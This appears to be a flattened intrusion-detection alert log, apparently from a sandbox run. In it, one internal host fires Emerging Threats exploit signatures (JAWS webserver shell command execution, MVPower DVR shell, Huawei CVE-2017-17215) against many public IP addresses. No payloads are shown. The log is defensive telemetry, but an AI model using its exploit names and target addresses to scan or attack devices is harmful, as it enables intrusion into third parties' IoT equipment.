                                                            192.168.2.2399.84.164.15758968802030092 01/26/24-15:31:52.668950TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5896880192.168.2.2399.84.164.157
                                                            192.168.2.2323.196.72.23146890802030092 01/26/24-15:32:15.819740TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4689080192.168.2.2323.196.72.231
                                                            192.168.2.23104.24.252.7356140802030092 01/26/24-15:31:01.089994TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5614080192.168.2.23104.24.252.73
                                                            192.168.2.2370.37.208.22547012802030092 01/26/24-15:32:41.653011TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4701280192.168.2.2370.37.208.225
                                                            192.168.2.23156.250.15.7359550802030092 01/26/24-15:31:28.086609TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5955080192.168.2.23156.250.15.73
                                                            192.168.2.2335.171.5.19058752802025883 01/26/24-15:32:28.234297TCP2025883ET EXPLOIT MVPower DVR Shell UCE5875280192.168.2.2335.171.5.190
                                                            192.168.2.2323.77.215.3954978802030092 01/26/24-15:31:33.317181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5497880192.168.2.2323.77.215.39
                                                            192.168.2.2358.27.229.5954696802030092 01/26/24-15:32:18.457147TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5469680192.168.2.2358.27.229.59
                                                            192.168.2.23222.99.0.240348802030092 01/26/24-15:31:23.586367TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4034880192.168.2.23222.99.0.2
                                                            192.168.2.23108.186.223.7460054802025883 01/26/24-15:31:15.563497TCP2025883ET EXPLOIT MVPower DVR Shell UCE6005480192.168.2.23108.186.223.74
                                                            192.168.2.2351.103.222.22957252802030092 01/26/24-15:31:47.419000TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5725280192.168.2.2351.103.222.229
                                                            192.168.2.23125.56.205.13542420802025883 01/26/24-15:32:21.670698TCP2025883ET EXPLOIT MVPower DVR Shell UCE4242080192.168.2.23125.56.205.135
                                                            192.168.2.23104.101.158.18648658802025883 01/26/24-15:32:23.736327TCP2025883ET EXPLOIT MVPower DVR Shell UCE4865880192.168.2.23104.101.158.186
                                                            192.168.2.2323.72.37.3652384802030092 01/26/24-15:32:44.709070TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5238480192.168.2.2323.72.37.36
                                                            192.168.2.2387.55.253.13856330802030092 01/26/24-15:32:09.847234TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5633080192.168.2.2387.55.253.138
                                                            192.168.2.2338.165.19.5959722802025883 01/26/24-15:31:52.717870TCP2025883ET EXPLOIT MVPower DVR Shell UCE5972280192.168.2.2338.165.19.59
                                                            192.168.2.23205.196.223.11843828802030092 01/26/24-15:31:47.595461TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4382880192.168.2.23205.196.223.118
                                                            192.168.2.23104.25.117.18253608802025883 01/26/24-15:32:25.541472TCP2025883ET EXPLOIT MVPower DVR Shell UCE5360880192.168.2.23104.25.117.182
                                                            192.168.2.2323.47.10.2860276802025883 01/26/24-15:33:01.789275TCP2025883ET EXPLOIT MVPower DVR Shell UCE6027680192.168.2.2323.47.10.28
                                                            192.168.2.2345.221.114.7953168802030092 01/26/24-15:32:35.546806TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5316880192.168.2.2345.221.114.79
                                                            192.168.2.2350.62.222.15055564802025883 01/26/24-15:31:49.642387TCP2025883ET EXPLOIT MVPower DVR Shell UCE5556480192.168.2.2350.62.222.150
                                                            192.168.2.23103.151.120.21040842802025883 01/26/24-15:32:33.084081TCP2025883ET EXPLOIT MVPower DVR Shell UCE4084280192.168.2.23103.151.120.210
                                                            192.168.2.2323.20.38.150340802030092 01/26/24-15:31:35.517957TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5034080192.168.2.2323.20.38.1
                                                            192.168.2.23142.166.236.25140872802030092 01/26/24-15:32:42.618573TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4087280192.168.2.23142.166.236.251
                                                            192.168.2.2369.135.54.10636628802025883 01/26/24-15:32:11.581498TCP2025883ET EXPLOIT MVPower DVR Shell UCE3662880192.168.2.2369.135.54.106
                                                            192.168.2.23198.57.211.4834030802025883 01/26/24-15:32:56.773866TCP2025883ET EXPLOIT MVPower DVR Shell UCE3403080192.168.2.23198.57.211.48
                                                            192.168.2.2345.201.221.1256156802030092 01/26/24-15:31:27.778518TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5615680192.168.2.2345.201.221.12
                                                            192.168.2.23111.51.104.23142970802025883 01/26/24-15:32:25.685688TCP2025883ET EXPLOIT MVPower DVR Shell UCE4297080192.168.2.23111.51.104.231
                                                            192.168.2.2352.163.56.3434990802030092 01/26/24-15:32:24.018002TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3499080192.168.2.2352.163.56.34
                                                            192.168.2.23195.42.149.6560862802030092 01/26/24-15:32:21.792089TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6086280192.168.2.23195.42.149.65
                                                            192.168.2.23138.188.47.4645194802025883 01/26/24-15:32:39.889155TCP2025883ET EXPLOIT MVPower DVR Shell UCE4519480192.168.2.23138.188.47.46
                                                            192.168.2.2313.113.68.2940470802025883 01/26/24-15:31:58.895992TCP2025883ET EXPLOIT MVPower DVR Shell UCE4047080192.168.2.2313.113.68.29
                                                            192.168.2.23106.52.149.2557494802030092 01/26/24-15:32:14.899767TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5749480192.168.2.23106.52.149.25
                                                            192.168.2.2375.101.206.19358582802030092 01/26/24-15:32:21.492792TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5858280192.168.2.2375.101.206.193
                                                            192.168.2.2323.57.227.14258234802030092 01/26/24-15:31:51.452288TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5823480192.168.2.2323.57.227.142
                                                            192.168.2.2354.69.13.2843748802030092 01/26/24-15:31:16.977419TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4374880192.168.2.2354.69.13.28
                                                            192.168.2.23184.51.27.22247982802025883 01/26/24-15:32:07.295597TCP2025883ET EXPLOIT MVPower DVR Shell UCE4798280192.168.2.23184.51.27.222
                                                            192.168.2.23154.201.21.16259970802030092 01/26/24-15:32:39.039742TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5997080192.168.2.23154.201.21.162
                                                            192.168.2.2372.246.165.14152866802030092 01/26/24-15:32:53.456854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5286680192.168.2.2372.246.165.141
                                                            192.168.2.2352.196.131.23246070802030092 01/26/24-15:31:13.014919TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4607080192.168.2.2352.196.131.232
                                                            192.168.2.23212.183.29.5340702802030092 01/26/24-15:32:47.917862TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4070280192.168.2.23212.183.29.53
                                                            192.168.2.23185.32.126.3250944802025883 01/26/24-15:31:47.670538TCP2025883ET EXPLOIT MVPower DVR Shell UCE5094480192.168.2.23185.32.126.32
                                                            192.168.2.23104.79.247.5443910802025883 01/26/24-15:32:23.572724TCP2025883ET EXPLOIT MVPower DVR Shell UCE4391080192.168.2.23104.79.247.54
                                                            192.168.2.23143.244.211.11039042802025883 01/26/24-15:32:42.632872TCP2025883ET EXPLOIT MVPower DVR Shell UCE3904280192.168.2.23143.244.211.110
                                                            192.168.2.2334.107.144.17433424802025883 01/26/24-15:31:37.805934TCP2025883ET EXPLOIT MVPower DVR Shell UCE3342480192.168.2.2334.107.144.174
                                                            192.168.2.2313.35.52.6847190802025883 01/26/24-15:32:41.764801TCP2025883ET EXPLOIT MVPower DVR Shell UCE4719080192.168.2.2313.35.52.68
                                                            192.168.2.2323.213.247.10141460802030092 01/26/24-15:32:18.461409TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4146080192.168.2.2323.213.247.101
                                                            192.168.2.23138.201.91.23248082802025883 01/26/24-15:31:41.784028TCP2025883ET EXPLOIT MVPower DVR Shell UCE4808280192.168.2.23138.201.91.232
                                                            192.168.2.2320.25.49.6034732802030092 01/26/24-15:32:18.576206TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3473280192.168.2.2320.25.49.60
                                                            192.168.2.23173.194.223.12051554802025883 01/26/24-15:31:01.075466TCP2025883ET EXPLOIT MVPower DVR Shell UCE5155480192.168.2.23173.194.223.120
                                                            192.168.2.2335.223.2.16043372802025883 01/26/24-15:32:41.790683TCP2025883ET EXPLOIT MVPower DVR Shell UCE4337280192.168.2.2335.223.2.160
                                                            192.168.2.23213.183.59.24454690802025883 01/26/24-15:32:21.865408TCP2025883ET EXPLOIT MVPower DVR Shell UCE5469080192.168.2.23213.183.59.244
                                                            192.168.2.2366.39.97.3749688802030092 01/26/24-15:32:18.363066TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4968880192.168.2.2366.39.97.37
                                                            192.168.2.2367.205.162.9947936802030092 01/26/24-15:31:27.619334TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4793680192.168.2.2367.205.162.99
                                                            192.168.2.2323.10.129.13339718802025883 01/26/24-15:32:33.568575TCP2025883ET EXPLOIT MVPower DVR Shell UCE3971880192.168.2.2323.10.129.133
                                                            192.168.2.2345.14.166.544134802030092 01/26/24-15:32:58.853882TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4413480192.168.2.2345.14.166.5
                                                            192.168.2.2377.246.102.7938904802025883 01/26/24-15:32:19.760228TCP2025883ET EXPLOIT MVPower DVR Shell UCE3890480192.168.2.2377.246.102.79
                                                            192.168.2.2383.240.212.19446456802030092 01/26/24-15:32:21.868639TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4645680192.168.2.2383.240.212.194
                                                            192.168.2.2313.249.109.20043456802025883 01/26/24-15:32:58.550474TCP2025883ET EXPLOIT MVPower DVR Shell UCE4345680192.168.2.2313.249.109.200
                                                            192.168.2.2320.71.11.13052724802030092 01/26/24-15:31:52.747621TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5272480192.168.2.2320.71.11.130
                                                            192.168.2.23178.68.44.8346740802030092 01/26/24-15:31:01.295766TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4674080192.168.2.23178.68.44.83
                                                            192.168.2.23197.188.167.5936186802030092 01/26/24-15:31:23.180588TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3618680192.168.2.23197.188.167.59
                                                            192.168.2.235.253.0.5242830802025883 01/26/24-15:32:44.946639TCP2025883ET EXPLOIT MVPower DVR Shell UCE4283080192.168.2.235.253.0.52
                                                            192.168.2.23156.250.15.7359358802025883 01/26/24-15:31:22.634380TCP2025883ET EXPLOIT MVPower DVR Shell UCE5935880192.168.2.23156.250.15.73
                                                            192.168.2.23184.51.104.1756314802030092 01/26/24-15:32:07.796229TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5631480192.168.2.23184.51.104.17
                                                            192.168.2.2313.224.63.24341116802025883 01/26/24-15:32:07.797964TCP2025883ET EXPLOIT MVPower DVR Shell UCE4111680192.168.2.2313.224.63.243
                                                            192.168.2.2366.228.56.19641006802030092 01/26/24-15:32:49.930063TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100680192.168.2.2366.228.56.196
                                                            192.168.2.2323.77.27.11560260802025883 01/26/24-15:31:54.025906TCP2025883ET EXPLOIT MVPower DVR Shell UCE6026080192.168.2.2323.77.27.115
                                                            192.168.2.2323.42.153.20256544802030092 01/26/24-15:32:53.498891TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5654480192.168.2.2323.42.153.202
                                                            192.168.2.23221.112.50.9242280802030092 01/26/24-15:31:23.967748TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4228080192.168.2.23221.112.50.92
                                                            192.168.2.23192.234.37.10551726802030092 01/26/24-15:32:41.768808TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5172680192.168.2.23192.234.37.105
                                                            192.168.2.23165.95.154.15844052802030092 01/26/24-15:31:18.585023TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4405280192.168.2.23165.95.154.158
                                                            192.168.2.23176.97.247.24847918802030092 01/26/24-15:32:44.957952TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4791880192.168.2.23176.97.247.248
                                                            192.168.2.2389.117.50.16039032802025883 01/26/24-15:31:18.793714TCP2025883ET EXPLOIT MVPower DVR Shell UCE3903280192.168.2.2389.117.50.160
                                                            192.168.2.23176.56.236.5856236802025883 01/26/24-15:32:30.860397TCP2025883ET EXPLOIT MVPower DVR Shell UCE5623680192.168.2.23176.56.236.58
                                                            192.168.2.23206.189.92.21646586802025883 01/26/24-15:31:15.731033TCP2025883ET EXPLOIT MVPower DVR Shell UCE4658680192.168.2.23206.189.92.216
                                                            192.168.2.2369.192.228.13047616802025883 01/26/24-15:32:28.904791TCP2025883ET EXPLOIT MVPower DVR Shell UCE4761680192.168.2.2369.192.228.130
                                                            192.168.2.23183.90.233.9447038802025883 01/26/24-15:32:28.468365TCP2025883ET EXPLOIT MVPower DVR Shell UCE4703880192.168.2.23183.90.233.94
                                                            192.168.2.23175.178.225.17141804802025883 01/26/24-15:32:40.067308TCP2025883ET EXPLOIT MVPower DVR Shell UCE4180480192.168.2.23175.178.225.171
                                                            192.168.2.23153.121.71.21649318802030092 01/26/24-15:32:48.060193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4931880192.168.2.23153.121.71.216
                                                            192.168.2.23195.22.248.21839446802030092 01/26/24-15:32:28.382250TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3944680192.168.2.23195.22.248.218
                                                            192.168.2.23156.77.139.5636632372152829579 01/26/24-15:32:52.336505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663237215192.168.2.23156.77.139.56
                                                            192.168.2.23173.95.53.15444912802030092 01/26/24-15:31:47.666291TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4491280192.168.2.23173.95.53.154
                                                            192.168.2.232.20.93.937890802030092 01/26/24-15:31:58.816455TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3789080192.168.2.232.20.93.9
                                                            192.168.2.2346.23.188.5536380802025883 01/26/24-15:31:13.988644TCP2025883ET EXPLOIT MVPower DVR Shell UCE3638080192.168.2.2346.23.188.55
                                                            192.168.2.2323.50.76.15939824802030092 01/26/24-15:31:35.677291TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3982480192.168.2.2323.50.76.159
                                                            192.168.2.23194.47.64.1758918802030092 01/26/24-15:31:47.772871TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5891880192.168.2.23194.47.64.17
                                                            192.168.2.23197.246.45.20139958372152835222 01/26/24-15:32:11.998768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995837215192.168.2.23197.246.45.201
                                                            192.168.2.2381.150.7.20744056802025883 01/26/24-15:32:23.587676TCP2025883ET EXPLOIT MVPower DVR Shell UCE4405680192.168.2.2381.150.7.207
                                                            192.168.2.23156.241.121.1541622372152835222 01/26/24-15:31:47.813013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162237215192.168.2.23156.241.121.15
                                                            192.168.2.23104.22.63.14333402802025883 01/26/24-15:31:55.603784TCP2025883ET EXPLOIT MVPower DVR Shell UCE3340280192.168.2.23104.22.63.143
                                                            192.168.2.2338.238.84.5248178802030092 01/26/24-15:32:08.099021TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4817880192.168.2.2338.238.84.52
                                                            192.168.2.231.232.247.1541192802025883 01/26/24-15:32:50.921301TCP2025883ET EXPLOIT MVPower DVR Shell UCE4119280192.168.2.231.232.247.15
                                                            192.168.2.23120.53.232.13745522802030092 01/26/24-15:32:21.724705TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4552280192.168.2.23120.53.232.137
                                                            192.168.2.23196.51.30.12260800802025883 01/26/24-15:31:32.888328TCP2025883ET EXPLOIT MVPower DVR Shell UCE6080080192.168.2.23196.51.30.122
                                                            192.168.2.23168.76.22.16955064802025883 01/26/24-15:31:22.829928TCP2025883ET EXPLOIT MVPower DVR Shell UCE5506480192.168.2.23168.76.22.169
                                                            192.168.2.23190.102.101.20333268802025883 01/26/24-15:32:28.469184TCP2025883ET EXPLOIT MVPower DVR Shell UCE3326880192.168.2.23190.102.101.203
                                                            192.168.2.23192.169.179.3658894802030092 01/26/24-15:31:27.638300TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5889480192.168.2.23192.169.179.36
                                                            192.168.2.23104.107.147.5552544802030092 01/26/24-15:32:01.807428TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5254480192.168.2.23104.107.147.55
                                                            192.168.2.232.21.34.9438766802025883 01/26/24-15:32:11.844043TCP2025883ET EXPLOIT MVPower DVR Shell UCE3876680192.168.2.232.21.34.94
                                                            192.168.2.2370.122.67.9741000802025883 01/26/24-15:33:00.440639TCP2025883ET EXPLOIT MVPower DVR Shell UCE4100080192.168.2.2370.122.67.97
                                                            192.168.2.23154.208.206.14256540802030092 01/26/24-15:32:25.566003TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5654080192.168.2.23154.208.206.142
                                                            192.168.2.2323.214.19.21236398802030092 01/26/24-15:32:58.676170TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3639880192.168.2.2323.214.19.212
                                                            192.168.2.2323.196.168.19136054802030092 01/26/24-15:32:53.430651TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3605480192.168.2.2323.196.168.191
                                                            192.168.2.2320.88.0.21156950802025883 01/26/24-15:32:48.719029TCP2025883ET EXPLOIT MVPower DVR Shell UCE5695080192.168.2.2320.88.0.211
                                                            192.168.2.2323.211.159.19633108802025883 01/26/24-15:31:53.309815TCP2025883ET EXPLOIT MVPower DVR Shell UCE3310880192.168.2.2323.211.159.196
                                                            192.168.2.2313.32.123.22959494802025883 01/26/24-15:32:36.929487TCP2025883ET EXPLOIT MVPower DVR Shell UCE5949480192.168.2.2313.32.123.229
                                                            192.168.2.23167.71.50.3558148802030092 01/26/24-15:31:58.714447TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5814880192.168.2.23167.71.50.35
                                                            192.168.2.23192.249.112.17734900802025883 01/26/24-15:31:35.552555TCP2025883ET EXPLOIT MVPower DVR Shell UCE3490080192.168.2.23192.249.112.177
                                                            192.168.2.2396.7.144.13155714802030092 01/26/24-15:31:17.001022TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5571480192.168.2.2396.7.144.131
                                                            192.168.2.2313.49.35.10336988802030092 01/26/24-15:32:28.348521TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3698880192.168.2.2313.49.35.103
                                                            192.168.2.2393.63.84.18940706802030092 01/26/24-15:32:21.603095TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4070680192.168.2.2393.63.84.189
                                                            192.168.2.2343.140.208.18834050802030092 01/26/24-15:32:22.048780TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3405080192.168.2.2343.140.208.188
                                                            192.168.2.23156.241.71.5842036372152829579 01/26/24-15:32:57.468846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203637215192.168.2.23156.241.71.58
                                                            192.168.2.23156.241.15.8642302372152829579 01/26/24-15:33:01.150691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230237215192.168.2.23156.241.15.86
                                                            192.168.2.23179.53.181.4856590802030092 01/26/24-15:32:09.544723TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5659080192.168.2.23179.53.181.48
                                                            192.168.2.23104.71.251.9738056802030092 01/26/24-15:32:07.600425TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3805680192.168.2.23104.71.251.97
                                                            192.168.2.2361.238.90.22750688802025883 01/26/24-15:31:17.092095TCP2025883ET EXPLOIT MVPower DVR Shell UCE5068880192.168.2.2361.238.90.227
                                                            192.168.2.2361.195.145.6556272802025883 01/26/24-15:32:21.950680TCP2025883ET EXPLOIT MVPower DVR Shell UCE5627280192.168.2.2361.195.145.65
                                                            192.168.2.23162.0.233.13637134802030092 01/26/24-15:32:23.725294TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3713480192.168.2.23162.0.233.136
                                                            192.168.2.23110.88.128.18545170802030092 01/26/24-15:32:30.780797TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4517080192.168.2.23110.88.128.185
                                                            192.168.2.23121.29.56.20453294802025883 01/26/24-15:31:35.873163TCP2025883ET EXPLOIT MVPower DVR Shell UCE5329480192.168.2.23121.29.56.204
                                                            192.168.2.23154.19.112.20358058802025883 01/26/24-15:31:58.717861TCP2025883ET EXPLOIT MVPower DVR Shell UCE5805880192.168.2.23154.19.112.203
                                                            192.168.2.23216.98.4.17555762802025883 01/26/24-15:32:09.658201TCP2025883ET EXPLOIT MVPower DVR Shell UCE5576280192.168.2.23216.98.4.175
                                                            192.168.2.23134.236.63.4959052802025883 01/26/24-15:32:12.175744TCP2025883ET EXPLOIT MVPower DVR Shell UCE5905280192.168.2.23134.236.63.49
                                                            192.168.2.23130.237.20.5237106802030092 01/26/24-15:31:30.884005TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3710680192.168.2.23130.237.20.52
                                                            192.168.2.2394.255.246.23957434802030092 01/26/24-15:32:18.340341TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5743480192.168.2.2394.255.246.239
                                                            192.168.2.2383.4.148.19847134802025883 01/26/24-15:32:36.974292TCP2025883ET EXPLOIT MVPower DVR Shell UCE4713480192.168.2.2383.4.148.198
                                                            192.168.2.23211.22.125.12247490802030092 01/26/24-15:33:00.860742TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4749080192.168.2.23211.22.125.122
                                                            192.168.2.23167.82.11.16647000802030092 01/26/24-15:31:18.051241TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4700080192.168.2.23167.82.11.166
                                                            192.168.2.2323.42.163.15553414802030092 01/26/24-15:32:42.803741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5341480192.168.2.2323.42.163.155
                                                            192.168.2.23147.46.85.25539674802030092 01/26/24-15:32:04.696625TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3967480192.168.2.23147.46.85.255
                                                            192.168.2.23100.27.4.9836268802025883 01/26/24-15:32:12.669266TCP2025883ET EXPLOIT MVPower DVR Shell UCE3626880192.168.2.23100.27.4.98
                                                            192.168.2.2318.198.182.19860782802025883 01/26/24-15:32:21.578212TCP2025883ET EXPLOIT MVPower DVR Shell UCE6078280192.168.2.2318.198.182.198
                                                            192.168.2.23185.128.234.233140802025883 01/26/24-15:31:41.689715TCP2025883ET EXPLOIT MVPower DVR Shell UCE3314080192.168.2.23185.128.234.2
                                                            192.168.2.2318.154.51.16553824802025883 01/26/24-15:31:13.820473TCP2025883ET EXPLOIT MVPower DVR Shell UCE5382480192.168.2.2318.154.51.165
                                                            192.168.2.23185.45.103.6455502802025883 01/26/24-15:31:41.714509TCP2025883ET EXPLOIT MVPower DVR Shell UCE5550280192.168.2.23185.45.103.64
                                                            192.168.2.2345.120.178.15140836802030092 01/26/24-15:32:50.723140TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4083680192.168.2.2345.120.178.151
                                                            192.168.2.23212.108.44.17052582802030092 01/26/24-15:32:25.494020TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5258280192.168.2.23212.108.44.170
                                                            192.168.2.2335.197.22.6754360802030092 01/26/24-15:32:56.785126TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5436080192.168.2.2335.197.22.67
                                                            192.168.2.23103.68.30.18244318802025883 01/26/24-15:31:44.329313TCP2025883ET EXPLOIT MVPower DVR Shell UCE4431880192.168.2.23103.68.30.182
                                                            192.168.2.2338.177.55.13441246802025883 01/26/24-15:32:22.560237TCP2025883ET EXPLOIT MVPower DVR Shell UCE4124680192.168.2.2338.177.55.134
                                                            192.168.2.2335.177.178.23848922802025883 01/26/24-15:31:52.755301TCP2025883ET EXPLOIT MVPower DVR Shell UCE4892280192.168.2.2335.177.178.238
                                                            192.168.2.23174.129.134.13157028802030092 01/26/24-15:32:18.241039TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5702880192.168.2.23174.129.134.131
                                                            192.168.2.23172.66.135.15451118802025883 01/26/24-15:32:14.830379TCP2025883ET EXPLOIT MVPower DVR Shell UCE5111880192.168.2.23172.66.135.154
                                                            192.168.2.2323.8.146.16960426802030092 01/26/24-15:31:19.034784TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6042680192.168.2.2323.8.146.169
                                                            192.168.2.23119.45.129.20653062802030092 01/26/24-15:32:23.703500TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5306280192.168.2.23119.45.129.206
                                                            192.168.2.23219.251.84.17336000802030092 01/26/24-15:32:33.033787TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3600080192.168.2.23219.251.84.173
                                                            192.168.2.23163.5.154.2347448802030092 01/26/24-15:31:49.533515TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4744880192.168.2.23163.5.154.23
                                                            192.168.2.2346.242.156.19355956802030092 01/26/24-15:31:30.666540TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5595680192.168.2.2346.242.156.193
                                                            192.168.2.23210.76.76.6951262802030092 01/26/24-15:31:20.732075TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5126280192.168.2.23210.76.76.69
                                                            192.168.2.2367.7.139.18651592802025883 01/26/24-15:31:44.584489TCP2025883ET EXPLOIT MVPower DVR Shell UCE5159280192.168.2.2367.7.139.186
                                                            192.168.2.2365.25.201.9034906802025883 01/26/24-15:31:49.478185TCP2025883ET EXPLOIT MVPower DVR Shell UCE3490680192.168.2.2365.25.201.90
                                                            192.168.2.23138.68.44.23233814802025883 01/26/24-15:31:52.709758TCP2025883ET EXPLOIT MVPower DVR Shell UCE3381480192.168.2.23138.68.44.232
                                                            192.168.2.23184.51.99.17551534802030092 01/26/24-15:32:37.067103TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5153480192.168.2.23184.51.99.175
                                                            192.168.2.2313.226.190.7859202802025883 01/26/24-15:32:01.354131TCP2025883ET EXPLOIT MVPower DVR Shell UCE5920280192.168.2.2313.226.190.78
                                                            192.168.2.2366.251.154.22433574802025883 01/26/24-15:32:50.968261TCP2025883ET EXPLOIT MVPower DVR Shell UCE3357480192.168.2.2366.251.154.224
                                                            192.168.2.232.23.6.5060212802025883 01/26/24-15:31:26.851705TCP2025883ET EXPLOIT MVPower DVR Shell UCE6021280192.168.2.232.23.6.50
                                                            192.168.2.23160.124.107.20050914802030092 01/26/24-15:32:58.726118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5091480192.168.2.23160.124.107.200
                                                            192.168.2.23204.174.66.8939856802025883 01/26/24-15:31:43.968492TCP2025883ET EXPLOIT MVPower DVR Shell UCE3985680192.168.2.23204.174.66.89
                                                            192.168.2.2323.215.23.3059722802030092 01/26/24-15:31:44.065852TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5972280192.168.2.2323.215.23.30
                                                            192.168.2.23164.46.69.6043902802030092 01/26/24-15:31:55.641850TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4390280192.168.2.23164.46.69.60
                                                            192.168.2.23117.20.106.5755902802030092 01/26/24-15:31:26.892259TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5590280192.168.2.23117.20.106.57
                                                            192.168.2.23103.51.145.5143612802030092 01/26/24-15:31:43.888363TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4361280192.168.2.23103.51.145.51
                                                            192.168.2.23202.40.219.19959744802025883 01/26/24-15:31:47.532173TCP2025883ET EXPLOIT MVPower DVR Shell UCE5974480192.168.2.23202.40.219.199
                                                            192.168.2.23187.192.184.22845978802025883 01/26/24-15:32:18.308942TCP2025883ET EXPLOIT MVPower DVR Shell UCE4597880192.168.2.23187.192.184.228
                                                            192.168.2.23121.67.77.25041980802025883 01/26/24-15:32:33.043388TCP2025883ET EXPLOIT MVPower DVR Shell UCE4198080192.168.2.23121.67.77.250
                                                            192.168.2.2354.157.101.12738484802030092 01/26/24-15:32:53.420753TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3848480192.168.2.2354.157.101.127
                                                            192.168.2.2369.85.94.24653286802025883 01/26/24-15:31:13.711293TCP2025883ET EXPLOIT MVPower DVR Shell UCE5328680192.168.2.2369.85.94.246
